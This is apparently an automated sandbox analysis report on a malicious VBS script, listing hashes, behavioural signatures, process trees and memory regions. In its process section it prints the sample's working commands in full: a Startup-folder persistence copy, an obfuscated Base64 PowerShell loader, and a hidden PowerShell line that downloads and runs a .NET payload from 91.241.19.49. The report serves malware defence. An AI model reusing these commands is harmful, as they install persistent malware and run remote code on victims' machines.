Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
15-12-2021 18:00
Static task
static1
Behavioral task
behavioral1
Sample
5d536406d735e27d910faf1813d79e0b.vbs
Resource
win7-en-20211208
General
-
Target
5d536406d735e27d910faf1813d79e0b.vbs
-
Size
151KB
-
MD5
5d536406d735e27d910faf1813d79e0b
-
SHA1
32f7716ddb61131917a90b83eb7fd74ce5eef16a
-
SHA256
887420d1dcca02056fb9b2aaffacaf87ac76d438fb4e4b9f244cde119db7ebc6
-
SHA512
1b797c0ada2656242d4017ecc33ce4045eece9a982cd4645e9e369e7d62ceed91e4f00ac14203077c349d8f815ed255d7fbe12742575e94f205bc319a9b365df
Malware Config
Extracted
http://91.241.19.49/ramdes/DownloaderF3.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1544 powershell.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1160 powershell.exe 1604 powershell.exe 1544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1160 powershell.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 1544 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.execmd.exepowershell.exedescription pid process target process PID 1080 wrote to memory of 680 1080 WScript.exe cmd.exe PID 1080 wrote to memory of 680 1080 WScript.exe cmd.exe PID 1080 wrote to memory of 680 1080 WScript.exe cmd.exe PID 680 wrote to memory of 632 680 cmd.exe PING.EXE PID 680 wrote to memory of 632 680 cmd.exe PING.EXE PID 680 wrote to memory of 632 680 cmd.exe PING.EXE PID 680 wrote to memory of 1160 680 cmd.exe powershell.exe PID 680 wrote to memory of 1160 680 cmd.exe powershell.exe PID 680 wrote to memory of 1160 680 cmd.exe powershell.exe PID 1080 wrote to memory of 1604 1080 WScript.exe powershell.exe PID 1080 wrote to memory of 1604 1080 WScript.exe powershell.exe PID 1080 wrote to memory of 1604 1080 WScript.exe powershell.exe PID 1604 wrote to memory of 1544 1604 powershell.exe powershell.exe PID 1604 wrote to memory of 1544 1604 powershell.exe powershell.exe PID 1604 wrote to memory of 1544 1604 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙HM☙bg☙v☙HQ☙cwBl☙HQ☙Lw☙5☙DQ☙Lg☙5☙DE☙Lg☙x☙DQ☙Mg☙u☙DE☙OQ☙v☙C8☙OgBw☙HQ☙d☙Bo☙Cc☙KQ☙p☙☙==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.sn/tset/94.91.142.19//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
2e1dfce6db3065b49f45898f0ceec668
SHA12c968d183fd6c63734ae5f1272c77f26adbd83bc
SHA256c1778abe9a13c6152ca3a6c6187d2f722483d83418734ec4a214c0647bb0aaaa
SHA5125c8179da4a11d336b65f8ea5c9b4e66633a2d817e72fe337651cac57173c0d3dc83088308272bc9a5111848549367b083ef8833b369b8c400c11357d0b77f44e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
2e1dfce6db3065b49f45898f0ceec668
SHA12c968d183fd6c63734ae5f1272c77f26adbd83bc
SHA256c1778abe9a13c6152ca3a6c6187d2f722483d83418734ec4a214c0647bb0aaaa
SHA5125c8179da4a11d336b65f8ea5c9b4e66633a2d817e72fe337651cac57173c0d3dc83088308272bc9a5111848549367b083ef8833b369b8c400c11357d0b77f44e
-
memory/632-57-0x0000000000000000-mapping.dmp
-
memory/680-56-0x0000000000000000-mapping.dmp
-
memory/1080-55-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmpFilesize
8KB
-
memory/1160-69-0x000000000293B000-0x000000000295A000-memory.dmpFilesize
124KB
-
memory/1160-60-0x000007FEF33F0000-0x000007FEF3F4D000-memory.dmpFilesize
11.4MB
-
memory/1160-64-0x000000001B6E0000-0x000000001B9DF000-memory.dmpFilesize
3.0MB
-
memory/1160-63-0x0000000002934000-0x0000000002937000-memory.dmpFilesize
12KB
-
memory/1160-61-0x0000000002930000-0x0000000002932000-memory.dmpFilesize
8KB
-
memory/1160-62-0x0000000002932000-0x0000000002934000-memory.dmpFilesize
8KB
-
memory/1160-58-0x0000000000000000-mapping.dmp
-
memory/1544-78-0x0000000001FE0000-0x0000000001FE2000-memory.dmpFilesize
8KB
-
memory/1544-82-0x0000000001FEB000-0x000000000200A000-memory.dmpFilesize
124KB
-
memory/1544-80-0x0000000001FE4000-0x0000000001FE7000-memory.dmpFilesize
12KB
-
memory/1544-76-0x000007FEF2B10000-0x000007FEF366D000-memory.dmpFilesize
11.4MB
-
memory/1544-79-0x0000000001FE2000-0x0000000001FE4000-memory.dmpFilesize
8KB
-
memory/1544-73-0x0000000000000000-mapping.dmp
-
memory/1604-71-0x0000000002562000-0x0000000002564000-memory.dmpFilesize
8KB
-
memory/1604-77-0x000000000256B000-0x000000000258A000-memory.dmpFilesize
124KB
-
memory/1604-72-0x0000000002564000-0x0000000002567000-memory.dmpFilesize
12KB
-
memory/1604-70-0x0000000002560000-0x0000000002562000-memory.dmpFilesize
8KB
-
memory/1604-68-0x000007FEF2B10000-0x000007FEF366D000-memory.dmpFilesize
11.4MB
-
memory/1604-65-0x0000000000000000-mapping.dmp